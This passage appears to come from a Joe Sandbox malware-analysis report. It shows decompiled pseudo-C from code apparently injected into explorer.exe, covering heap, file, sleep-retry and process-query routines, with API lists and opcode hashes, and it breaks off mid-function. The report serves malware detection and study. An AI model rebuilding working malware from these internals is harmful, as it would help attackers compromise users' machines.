                                          C-Code - Quality: 100%
                                          			E000C3017() {
                                          				signed int _t4;
                                          				intOrPtr _t8;
                                          				void* _t11;
                                          
                                          				_t4 =  *0xde688; // 0xf0000
                                          				if( *((intOrPtr*)(_t4 + 0x214)) != 3) {
                                          					L3:
                                          					return _t4 | 0xffffffff;
                                          				} else {
                                          					_t4 = E000CBB20(_t11);
                                          					if(_t4 != 0) {
                                          						goto L3;
                                          					} else {
                                          						AllocConsole();
                                          						_t8 =  *0xde684; // 0x14cf8f0
                                          						 *((intOrPtr*)(_t8 + 0x118))(E000C2FF7, 1);
                                          						return 0;
                                          					}
                                          				}
                                          			}

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocConsole
                                          • String ID:
                                          • API String ID: 4167703944-0
                                          • Opcode ID: 2e30d3ae640417c316c0b46691cdc600fa2e0baa99ae763e0b8977d3442c29b1
                                          • Instruction ID: e3d5e7fce8a631e6da497200553c8db31a05f735526e739650b2f22a81ba6811
                                          • Opcode Fuzzy Hash: 2e30d3ae640417c316c0b46691cdc600fa2e0baa99ae763e0b8977d3442c29b1
                                          • Instruction Fuzzy Hash: D3E012312111058BDA10A774CD8AFD833E0AF28751F9641B4F614CE0E2D7B4C941C722
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 68%
                                          			E000CA63B(WCHAR* __ecx) {
                                          				signed int _t5;
                                          
                                          				_t5 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0);
                                          				_t2 = _t5 + 1; // 0x1
                                          				asm("sbb ecx, ecx");
                                          				return _t5 &  ~_t2;
                                          			}




                                          0x000ca64f
                                          0x000ca652
                                          0x000ca657
                                          0x000ca65b

                                          APIs
                                          • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,000CA6C9,00000000,00000400,00000000,000CF8B5,000CF8B5,?,000CFA56,00000000), ref: 000CA64F
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: dc10efbfdf4d0596efad4b309aca95c70faf63e936817f64c8de1a56b9c95d3c
                                          • Instruction ID: 1068c18890d774138d04a37c6931822a42b8c5c396f3f8334ead4a3a4bc70c88
                                          • Opcode Fuzzy Hash: dc10efbfdf4d0596efad4b309aca95c70faf63e936817f64c8de1a56b9c95d3c
                                          • Instruction Fuzzy Hash: 73D012B13A0100BEFB2C9B34CD9AF72339CD714701F22025C7A06EA0E1CA69E9048720
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E000C8604(long _a4) {
                                          				void* _t2;
                                          
                                          				_t2 = RtlAllocateHeap( *0xde768, 8, _a4); // executed
                                          				return _t2;
                                          			}




                                          0x000c8612
                                          0x000c8619

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: f6f2957317a3188cc199931cfeb9fc39ac0a0652bc30cfb8c835e5094af43c40
                                          • Instruction ID: 67f2f94d9d2d1e8656920a461522efd37944946b4c73135d0d1b7f49406c2d62
                                          • Opcode Fuzzy Hash: f6f2957317a3188cc199931cfeb9fc39ac0a0652bc30cfb8c835e5094af43c40
                                          • Instruction Fuzzy Hash: CFB09235085A08BBFEC12B81ED05E843F69EB04655F008012FA08080708A6664649BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E000CB269(WCHAR* __ecx) {
                                          
                                          				return 0 | GetFileAttributesW(__ecx) != 0xffffffff;
                                          			}



                                          0x000cb27c

                                          APIs
                                          • GetFileAttributesW.KERNELBASE(00000000,000C4E7B), ref: 000CB26F
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: 66e348a4375615d6ddbf5efb008cd9aa4b82378b74d2163687bee5487349325c
                                          • Instruction ID: e31c5f2542f69ce23b2b76098601bb74ace79624de71742bfcf3cc401eb3d774
                                          • Opcode Fuzzy Hash: 66e348a4375615d6ddbf5efb008cd9aa4b82378b74d2163687bee5487349325c
                                          • Instruction Fuzzy Hash: E5B092B62210404BCA186B38998484D32909B1C2313220759B033CA0E1D624C8509A10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E000C85EF() {
                                          				void* _t1;
                                          
                                          				_t1 = HeapCreate(0, 0x80000, 0); // executed
                                          				 *0xde768 = _t1;
                                          				return _t1;
                                          			}




                                          0x000c85f8
                                          0x000c85fe
                                          0x000c8603

                                          APIs
                                          • HeapCreate.KERNELBASE(00000000,00080000,00000000,000C5FA7), ref: 000C85F8
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateHeap
                                          • String ID:
                                          • API String ID: 10892065-0
                                          • Opcode ID: 1adbe088cf2c0bd30e5e52d93837b567d357e8130d197641d92511886dae2574
                                          • Instruction ID: 97f405ab2dff3ce32c07cefcd6e371dde968c6b9a07cde9570e7adef5d1870a3
                                          • Opcode Fuzzy Hash: 1adbe088cf2c0bd30e5e52d93837b567d357e8130d197641d92511886dae2574
                                          • Instruction Fuzzy Hash: 3EB01270686700A6F3D03B209C06B003B50A300B06F304007FF045C1D0CBB41004CF34
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 89%
                                          			E000CF9BF(void* __edx) {
                                          				char _v8;
                                          				char _v12;
                                          				char _v16;
                                          				char _v20;
                                          				char _v24;
                                          				intOrPtr _t26;
                                          				char _t27;
                                          				intOrPtr _t29;
                                          				void* _t31;
                                          				void* _t36;
                                          				char _t38;
                                          				intOrPtr _t39;
                                          				char _t42;
                                          				intOrPtr _t51;
                                          				intOrPtr _t52;
                                          				intOrPtr* _t63;
                                          				intOrPtr _t66;
                                          				char* _t67;
                                          				intOrPtr _t69;
                                          				char _t78;
                                          				void* _t81;
                                          				void* _t82;
                                          
                                          				_t26 =  *0xde654; // 0x14cfd20
                                          				_t27 = E000C8604( *((intOrPtr*)(_t26 + 4))); // executed
                                          				_v12 = _t27;
                                          				if(_t27 != 0) {
                                          					_t63 =  *0xde654; // 0x14cfd20
                                          					if( *((intOrPtr*)(_t63 + 4)) > 0x400) {
                                          						E000C86E1(_t27,  *_t63, 0x400);
                                          						_v8 = 0;
                                          						_t36 = E000C109A(_t63, 0x34a);
                                          						_t66 =  *0xde688; // 0xf0000
                                          						_t72 =  !=  ? 0x67d : 0x615;
                                          						_t38 = E000C95E1(_t66,  !=  ? 0x67d : 0x615);
                                          						_push(0);
                                          						_push(_t36);
                                          						_t67 = "\\";
                                          						_v24 = _t38;
                                          						_push(_t67);
                                          						_push(_t38);
                                          						_t39 =  *0xde688; // 0xf0000
                                          						_push(_t67);
                                          						_v20 = E000C92E5(_t39 + 0x1020);
                                          						_t42 = E000CA6A9( &_v8, _t41,  &_v8); // executed
                                          						_v16 = _t42;
                                          						E000C85D5( &_v24);
                                          						E000C85D5( &_v20);
                                          						_t73 = _v16;
                                          						_t82 = _t81 + 0x3c;
                                          						_t69 = _v8;
                                          						if(_v16 != 0 && _t69 > 0x400) {
                                          							_t51 =  *0xde654; // 0x14cfd20
                                          							_t52 =  *((intOrPtr*)(_t51 + 4));
                                          							_t53 =  <  ? _t69 : _t52;
                                          							_t54 = ( <  ? _t69 : _t52) + 0xfffffc00;
                                          							E000C86E1(_v12 + 0x400, _t73 + 0x400, ( <  ? _t69 : _t52) + 0xfffffc00);
                                          							_t69 = _v8;
                                          							_t82 = _t82 + 0xc;
                                          						}
                                          						E000C861A( &_v16, _t69);
                                          						E000C861A( &_v20, 0xfffffffe);
                                          						_t27 = _v12;
                                          						_t81 = _t82 + 0x10;
                                          						_t63 =  *0xde654; // 0x14cfd20
                                          					}
                                          					_t78 = 0;
                                          					while(1) {
                                          						_t29 =  *0xde688; // 0xf0000
                                          						_t31 = E000CA77D(_t29 + 0x228, _t27,  *((intOrPtr*)(_t63 + 4))); // executed
                                          						_t81 = _t81 + 0xc;
                                          						if(_t31 >= 0) {
                                          							break;
                                          						}
                                          						Sleep(1);
                                          						_t78 = _t78 + 1;
                                          						if(_t78 < 0x2710) {
                                          							_t27 = _v12;
                                          							_t63 =  *0xde654; // 0x14cfd20
                                          							continue;
                                          						}
                                          						break;
                                          					}
                                          					E000C861A( &_v12, 0);
                                          				}
                                          				return 0;
                                          			}


























                                          APIs
                                            • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
                                          • Sleep.KERNELBASE(00000001,00000000,00000000,00000000,?,?,?,?,000CF8B5,?,?,?,000CFCB9,00000000), ref: 000CFAEC
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeapSleep
                                          • String ID:
                                          • API String ID: 4201116106-0
                                          • Opcode ID: abf1f574cf568c11f3fe9f5b8eb334b7d627a063f95a5a36b2a35ba8cde40ca9
                                          • Instruction ID: 0cbca30703809a2c9c0d4c860327d646f2255841ca950a665f446f2c8c25f923
                                          • Opcode Fuzzy Hash: abf1f574cf568c11f3fe9f5b8eb334b7d627a063f95a5a36b2a35ba8cde40ca9
                                          • Instruction Fuzzy Hash: F0417FB2A00105ABEB04EBA4CD85FAEB7BDEB54304B14407EF905DB242DB39DA05CB65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 97%
                                          			E000C896F(WCHAR* __ecx, short __edx, intOrPtr _a4, short _a8) {
                                          				char _v8;
                                          				WCHAR* _v12;
                                          				signed int _v16;
                                          				WCHAR* _v20;
                                          				short _t30;
                                          				short _t33;
                                          				intOrPtr _t38;
                                          				intOrPtr _t43;
                                          				intOrPtr _t45;
                                          				short _t49;
                                          				void* _t52;
                                          				char _t71;
                                          				WCHAR* _t72;
                                          
                                          				_v16 = _v16 & 0x00000000;
                                          				_t71 = 0;
                                          				_v12 = __ecx;
                                          				_t49 = __edx;
                                          				_v8 = 0;
                                          				_t72 = E000C8604(0x448);
                                          				_v20 = _t72;
                                          				_pop(_t52);
                                          				if(_t72 != 0) {
                                          					_t72[0x21a] = __edx;
                                          					_t72[0x21c] = _a8;
                                          					lstrcpynW(_t72, _v12, 0x200);
                                          					if(_t49 != 1) {
                                          						_t30 = E000C8604(0x100000);
                                          						_t72[0x212] = _t30;
                                          						if(_t30 != 0) {
                                          							_t69 = _a4;
                                          							_t72[0x216] = 0x100000;
                                          							if(_a4 != 0) {
                                          								E000C87EA(_t72, _t69);
                                          							}
                                          							L16:
                                          							return _t72;
                                          						}
                                          						L7:
                                          						if(_t71 != 0) {
                                          							E000C861A( &_v8, 0);
                                          						}
                                          						L9:
                                          						_t33 = _t72[0x218];
                                          						if(_t33 != 0) {
                                          							_t38 =  *0xde684; // 0x14cf8f0
                                          							 *((intOrPtr*)(_t38 + 0x30))(_t33);
                                          						}
                                          						_t73 =  &(_t72[0x212]);
                                          						if(_t72[0x212] != 0) {
                                          							E000C861A(_t73, 0);
                                          						}
                                          						E000C861A( &_v20, 0);
                                          						goto L1;
                                          					}
                                          					_t43 = E000CA6A9(_t52, _v12,  &_v16); // executed
                                          					_t71 = _t43;
                                          					_v8 = _t71;
                                          					if(_t71 == 0) {
                                          						goto L9;
                                          					}
                                          					if(E000C8815(_t72, _t71, _v16, _a4) < 0) {
                                          						goto L7;
                                          					} else {
                                          						_t45 =  *0xde684; // 0x14cf8f0
                                          						 *((intOrPtr*)(_t45 + 0x30))(_t72[0x218]);
                                          						_t72[0x218] = _t72[0x218] & 0x00000000;
                                          						E000C861A( &_v8, 0);
                                          						goto L16;
                                          					}
                                          				}
                                          				L1:
                                          				return 0;
                                          			}

















                                          APIs
                                            • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
                                          • lstrcpynW.KERNEL32(00000000,00000000,00000200,00000000,00000000,00000003), ref: 000C89B9
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeaplstrcpyn
                                          • String ID:
                                          • API String ID: 680773602-0
                                          • Opcode ID: 6233b6b3d4297c436b7d4ea9638664684535f7d866eee7f8ed876d75261b8930
                                          • Instruction ID: f7af5643379fb798a10d9983aff7c2aee7eeb5d10f7fdca91578ae01a6c37180
                                          • Opcode Fuzzy Hash: 6233b6b3d4297c436b7d4ea9638664684535f7d866eee7f8ed876d75261b8930
                                          • Instruction Fuzzy Hash: 96318172A04304EFEB249BA5D845F9EB7E9EF44760F64842EF50597182DF30AA00875D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 75%
                                          			E000CE2C6(void* __fp0, intOrPtr _a4) {
                                          				char _v8;
                                          				char _v12;
                                          				char _v16;
                                          				char _v20;
                                          				void* _v24;
                                          				void* _v28;
                                          				char _v32;
                                          				char _v544;
                                          				signed int _t40;
                                          				intOrPtr _t41;
                                          				intOrPtr _t48;
                                          				intOrPtr _t58;
                                          				void* _t65;
                                          				intOrPtr _t66;
                                          				void* _t70;
                                          				signed int _t73;
                                          				void* _t75;
                                          				void* _t77;
                                          
                                          				_t77 = __fp0;
                                          				_v20 = 0;
                                          				_v28 = 0;
                                          				_v24 = 0;
                                          				_t66 =  *0xde6b4; // 0x14cfa98, executed
                                          				_t40 =  *((intOrPtr*)(_t66 + 4))(_t65, 0, 2,  &_v8, 0xffffffff,  &_v20,  &_v28,  &_v24);
                                          				if(_t40 == 0) {
                                          					_t73 = 0;
                                          					if(_v20 <= 0) {
                                          						L9:
                                          						_t41 =  *0xde6b4; // 0x14cfa98
                                          						 *((intOrPtr*)(_t41 + 0xc))(_v8);
                                          						return 0;
                                          					}
                                          					do {
                                          						_v16 = 0;
                                          						_v12 = 0;
                                          						_t48 =  *0xde68c; // 0x14cfab8
                                          						 *((intOrPtr*)(_t48 + 0xc4))(0,  *((intOrPtr*)(_v8 + _t73 * 4)), 0,  &_v16, 0,  &_v12,  &_v32);
                                          						_t70 = E000C8604(_v16 + 1);
                                          						if(_t70 != 0) {
                                          							_v12 = 0x200;
                                          							_push( &_v32);
                                          							_push( &_v12);
                                          							_push( &_v544);
                                          							_push( &_v16);
                                          							_push(_t70);
                                          							_push( *((intOrPtr*)(_v8 + _t73 * 4)));
                                          							_t58 =  *0xde68c; // 0x14cfab8
                                          							_push(0);
                                          							if( *((intOrPtr*)(_t58 + 0xc4))() != 0) {
                                          								E000C4905(_t77,  *((intOrPtr*)(_v8 + _t73 * 4)), _t70, _a4);
                                          								_t75 = _t75 + 0xc;
                                          								Sleep(0xa);
                                          							}
                                          						}
                                          						_t73 = _t73 + 1;
                                          					} while (_t73 < _v20);
                                          					goto L9;
                                          				}
                                          				return _t40 | 0xffffffff;
                                          			}

                                          APIs
                                          • Sleep.KERNELBASE(0000000A), ref: 000CE394
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Sleep
                                          • String ID:
                                          • API String ID: 3472027048-0
                                          • Opcode ID: 3c536258f97a264e063477df406c0674c7dd0b9c6861bbef04606a2caf0c6c18
                                          • Instruction ID: d27438c55f7a9eb286fce9ed97ab300969749f514a42abca27bfc32afb8dea28
                                          • Opcode Fuzzy Hash: 3c536258f97a264e063477df406c0674c7dd0b9c6861bbef04606a2caf0c6c18
                                          • Instruction Fuzzy Hash: 1A310DB5900158AFDB11DF94CD88EEFBBBCEB08350F1142AAB911E7291D730AE018B61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E000CA3ED(signed int __ecx, intOrPtr* __edx, void* __fp0) {
                                          				intOrPtr _v8;
                                          				signed int _v16;
                                          				char _v20;
                                          				void* _t24;
                                          				char _t25;
                                          				signed int _t30;
                                          				intOrPtr* _t45;
                                          				signed int _t46;
                                          				void* _t47;
                                          				void* _t54;
                                          
                                          				_t54 = __fp0;
                                          				_t45 = __edx;
                                          				_t46 = 0;
                                          				_t30 = __ecx;
                                          				if( *__edx > 0) {
                                          					do {
                                          						_t24 = E000C9ED0(_t30,  *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + _t46 * 8))); // executed
                                          						if(_t24 == 0) {
                                          							_t25 = E000C9749( *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + 4 + _t46 * 8)));
                                          							_v8 = _t25;
                                          							if(_t25 != 0) {
                                          								L6:
                                          								_v16 = _v16 & 0x00000000;
                                          								_v20 = _t25;
                                          								E000CA0AB(_t30,  *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + _t46 * 8)), _t54,  &_v20, 8, 2); // executed
                                          								_t47 = _t47 + 0xc;
                                          							} else {
                                          								if(GetLastError() != 0xd) {
                                          									_t25 = _v8;
                                          									goto L6;
                                          								} else {
                                          									E000C9F48( *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + 4 + _t46 * 8))); // executed
                                          								}
                                          							}
                                          						}
                                          						_t46 = _t46 + 1;
                                          					} while (_t46 <  *_t45);
                                          				}
                                          				return 0;
                                          			}

                                          APIs
                                            • Part of subcall function 000C9749: SetLastError.KERNEL32(0000000D,00000000,00000000,000CA341,00000000,00000000,?,?,?,000C5AE1), ref: 000C9782
                                          • GetLastError.KERNEL32(00000000,?,00000000,?,?,?,?,000C4C60,?,?,00000000), ref: 000CA424
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast
                                          • String ID:
                                          • API String ID: 1452528299-0
                                          • Opcode ID: b57cf1d61cdb095835d73ad5a8e6bc193129740f7953490e1dc8bc682e72e34b
                                          • Instruction ID: d7e6118cc00964f766b737b52ca09863481d2aae4fe2f29f29cc8711e36414d7
                                          • Opcode Fuzzy Hash: b57cf1d61cdb095835d73ad5a8e6bc193129740f7953490e1dc8bc682e72e34b
                                          • Instruction Fuzzy Hash: 71116175B0010AABCB14DF59C489F9EF3AAFB85719F20816DD80197242DB70ED05CBD1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 95%
                                          			E000C5D7D(void* __eflags) {
                                          				char _v44;
                                          				intOrPtr _t7;
                                          				intOrPtr _t10;
                                          				void* _t11;
                                          				WCHAR* _t12;
                                          				WCHAR* _t13;
                                          				WCHAR* _t14;
                                          				intOrPtr _t15;
                                          				intOrPtr _t19;
                                          				intOrPtr _t22;
                                          				void* _t27;
                                          				WCHAR* _t28;
                                          
                                          				_t7 =  *0xde688; // 0xf0000
                                          				E000CA86D( &_v44,  *((intOrPtr*)(_t7 + 0xac)) + 4, __eflags);
                                          				_t10 =  *0xde684; // 0x14cf8f0
                                          				_t28 = 2;
                                          				_t11 =  *((intOrPtr*)(_t10 + 0xbc))(_t28, 0,  &_v44, _t27);
                                          				if(_t11 == 0) {
                                          					_t22 =  *0xde688; // 0xf0000
                                          					_t12 = E000C5974( *((intOrPtr*)(_t22 + 0xac)), 0, __eflags); // executed
                                          					 *0xde6ac = _t12;
                                          					__eflags = _t12;
                                          					if(_t12 != 0) {
                                          						_t14 = E000C9EBB();
                                          						__eflags = _t14;
                                          						if(_t14 == 0) {
                                          							_t28 = 0;
                                          							__eflags = 0;
                                          						} else {
                                          							_t15 =  *0xde688; // 0xf0000
                                          							lstrcmpiW(_t15 + 0x228, _t14);
                                          							asm("sbb esi, esi");
                                          							_t28 = _t28 + 1;
                                          						}
                                          					}
                                          					_t13 = _t28;
                                          				} else {
                                          					_t19 =  *0xde684; // 0x14cf8f0
                                          					 *((intOrPtr*)(_t19 + 0x30))(_t11);
                                          					_t13 = 3;
                                          				}
                                          				return _t13;
                                          			}

                                          APIs
                                          • lstrcmpiW.KERNEL32(000EFDD8,00000000), ref: 000C5DF2
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcmpi
                                          • String ID:
                                          • API String ID: 1586166983-0
                                          • Opcode ID: b5c5492bde0fcbd79c8d76813e54915602f39492791b3c08382e59e2492a186d
                                          • Instruction ID: 103ad920e2b6f5a977f8ee732e07f157b635f09cc7f745bb5b42d842e6e571db
                                          • Opcode Fuzzy Hash: b5c5492bde0fcbd79c8d76813e54915602f39492791b3c08382e59e2492a186d
                                          • Instruction Fuzzy Hash: 7201B1312026119FF754EBA9DC89F9E33E8DB58341F054029F902DF1E2DA60E840C7B1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E000CBA05() {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				intOrPtr _t15;
                                          				void* _t16;
                                          				void* _t18;
                                          				void* _t21;
                                          				intOrPtr _t22;
                                          				void* _t24;
                                          				void* _t30;
                                          
                                          				_v8 = _v8 & 0x00000000;
                                          				_t15 =  *0xde68c; // 0x14cfab8
                                          				_t16 =  *((intOrPtr*)(_t15 + 0x70))(_t24, 8,  &_v8, _t24, _t24);
                                          				if(_t16 != 0) {
                                          					_v12 = _v12 & 0x00000000;
                                          					_t18 = E000CB998(1,  &_v12); // executed
                                          					_t30 = _t18;
                                          					if(_t30 != 0) {
                                          						CloseHandle(_v8);
                                          						_t21 = _t30;
                                          					} else {
                                          						if(_v8 != _t18) {
                                          							_t22 =  *0xde684; // 0x14cf8f0
                                          							 *((intOrPtr*)(_t22 + 0x30))(_v8);
                                          						}
                                          						_t21 = 0;
                                          					}
                                          					return _t21;
                                          				} else {
                                          					return _t16;
                                          				}
                                          			}

                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6c71d26ea1c7d67146cd9b950da2090079754ff8c0595719dac4e2876920f872
                                          • Instruction ID: 1444dde37cf9ff6e32baa45f932119c6418e42d8efec47e869b3358f31e80b18
                                          • Opcode Fuzzy Hash: 6c71d26ea1c7d67146cd9b950da2090079754ff8c0595719dac4e2876920f872
                                          • Instruction Fuzzy Hash: A2F06931A10208EFDF60EBA0C986FAE77F8EB04399F1140A9B441EB151DB74DE009B61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E000C5CEC(void* __ecx, void* __eflags, void* __fp0) {
                                          				void _v44;
                                          				signed int _t8;
                                          				intOrPtr _t14;
                                          				intOrPtr _t15;
                                          				intOrPtr _t21;
                                          				void* _t24;
                                          				void* _t29;
                                          				void* _t35;
                                          
                                          				_t35 = __eflags;
                                          				_t24 = __ecx;
                                          				_t8 =  *0xde688; // 0xf0000
                                          				E000D249B(_t8,  *((intOrPtr*)(_t8 + 0x224))); // executed
                                          				E000C85EF();
                                          				E000C8F78();
                                          				 *0xde780 = 0;
                                          				 *0xde784 = 0;
                                          				 *0xde77c = 0;
                                          				E000C5EB6(); // executed
                                          				E000CCF84(_t24);
                                          				_t14 =  *0xde688; // 0xf0000
                                          				 *((intOrPtr*)(_t14 + 0xa4)) = 2;
                                          				_t15 =  *0xde688; // 0xf0000
                                          				E000CA86D( &_v44,  *((intOrPtr*)(_t15 + 0xac)) + 7, _t35);
                                          				E000CB337( &_v44);
                                          				memset( &_v44, 0, 0x27);
                                          				E000C5C26( &_v44, __fp0);
                                          				_t21 =  *0xde684; // 0x14cf8f0
                                          				 *((intOrPtr*)(_t21 + 0xdc))(0, _t29);
                                          				return 0;
                                          			}

                                          APIs
                                            • Part of subcall function 000C85EF: HeapCreate.KERNELBASE(00000000,00080000,00000000,000C5FA7), ref: 000C85F8
                                            • Part of subcall function 000CCF84: GetCurrentProcess.KERNEL32(?,?,000F0000,?,000C3545), ref: 000CCF90
                                            • Part of subcall function 000CCF84: GetModuleFileNameW.KERNEL32(00000000,000F1644,00000105,?,?,000F0000,?,000C3545), ref: 000CCFB1
                                            • Part of subcall function 000CCF84: memset.MSVCRT ref: 000CCFE2
                                            • Part of subcall function 000CCF84: GetVersionExA.KERNEL32(000F0000,000F0000,?,000C3545), ref: 000CCFED
                                            • Part of subcall function 000CCF84: GetCurrentProcessId.KERNEL32(?,000C3545), ref: 000CCFF3
                                            • Part of subcall function 000CB337: CloseHandle.KERNELBASE(00000000,?,00000000,000C3C8A,?,?,?,?,?,?,?,?,000C3D6F,00000000), ref: 000CB36A
                                          • memset.MSVCRT ref: 000C5D5F
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CurrentProcessmemset$CloseCreateFileHandleHeapModuleNameVersion
                                          • String ID:
                                          • API String ID: 4245722550-0
                                          • Opcode ID: fa89a80829d7a9760737cc4274533f209aa92eb7a2269d63f0a7b72384ce7043
                                          • Instruction ID: af213eb193222f81b8a95cd20b2ee53c4ca132bbc1b9434b2fcea704800a8989
                                          • Opcode Fuzzy Hash: fa89a80829d7a9760737cc4274533f209aa92eb7a2269d63f0a7b72384ce7043
                                          • Instruction Fuzzy Hash: 78011D715022549FF600FBA8DC8AEDD3BE4EF29350F45006AF8049B263DB74A545CBB6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E000C861A(int _a4, intOrPtr _a8) {
                                          				int _t3;
                                          				intOrPtr _t4;
                                          				void* _t9;
                                          
                                          				_t3 = _a4;
                                          				if(_t3 == 0) {
                                          					return _t3;
                                          				}
                                          				_t9 =  *_t3;
                                          				if(_t9 != 0) {
                                          					 *_t3 =  *_t3 & 0x00000000;
                                          					_t4 = _a8;
                                          					if(_t4 != 0xffffffff) {
                                          						if(_t4 == 0xfffffffe) {
                                          							_t4 = E000CC392(_t9);
                                          						}
                                          					} else {
                                          						_t4 = E000CC379(_t9);
                                          					}
                                          					E000C874F(_t9, 0, _t4);
                                          					_t3 = HeapFree( *0xde768, 0, _t9); // executed
                                          				}
                                          				return _t3;
                                          			}

                                          APIs
                                          • HeapFree.KERNEL32(00000000,00000000,00000001), ref: 000C8660
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: 29d119adc27ebfcbbca3d09bb5a218d10cee232c1cd15d8c43ca6c796faa6935
                                          • Instruction ID: bdf107fd91a53e23c3bc046cb1b94fcf4e343da30d7e73e1e878ef7509521b23
                                          • Opcode Fuzzy Hash: 29d119adc27ebfcbbca3d09bb5a218d10cee232c1cd15d8c43ca6c796faa6935
                                          • Instruction Fuzzy Hash: 94F0A031502624AFEA616B24EC01FAE37889F02B30F24C209F818AA1E1DF309D0087ED
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E000CA77D(WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
                                          				signed int _t5;
                                          				void* _t6;
                                          				void* _t10;
                                          				long _t15;
